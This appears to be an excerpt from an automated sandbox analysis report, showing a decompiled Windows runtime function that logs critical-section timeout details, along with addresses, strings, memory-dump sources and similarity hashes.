                                                                                        Non-executed Functions

                                                                                        Function 0472FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 53%
                                                                                        			E0472FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E046DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04725720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04725720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                        0x0472fdda
                                                                                        0x0472fde2
                                                                                        0x0472fde5
                                                                                        0x0472fdec
                                                                                        0x0472fdfa
                                                                                        0x0472fdff
                                                                                        0x0472fe0a
                                                                                        0x0472fe0f
                                                                                        0x0472fe17
                                                                                        0x0472fe1e
                                                                                        0x0472fe19
                                                                                        0x0472fe19
                                                                                        0x0472fe19
                                                                                        0x0472fe20
                                                                                        0x0472fe21
                                                                                        0x0472fe22
                                                                                        0x0472fe25
                                                                                        0x0472fe40

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0472FDFA
                                                                                        Strings
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0472FE2B
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0472FE01
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                        • API String ID: 885266447-3903918235
                                                                                        • Opcode ID: 5cefdf139285447d5c7d8aeec973f3882020aa5ae8d09a75fa7f00a8e50c4f53
                                                                                        • Instruction ID: a90f40b16c402df19e4bc1df6addfcb3ac96cccdca118549ffa1dd2f6ebbd42f
                                                                                        • Opcode Fuzzy Hash: 5cefdf139285447d5c7d8aeec973f3882020aa5ae8d09a75fa7f00a8e50c4f53
                                                                                        • Instruction Fuzzy Hash: ADF0F672640611BFE6212A55DD06F33BB6AEB44B30F140358F628562D1EA62FC2096F4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%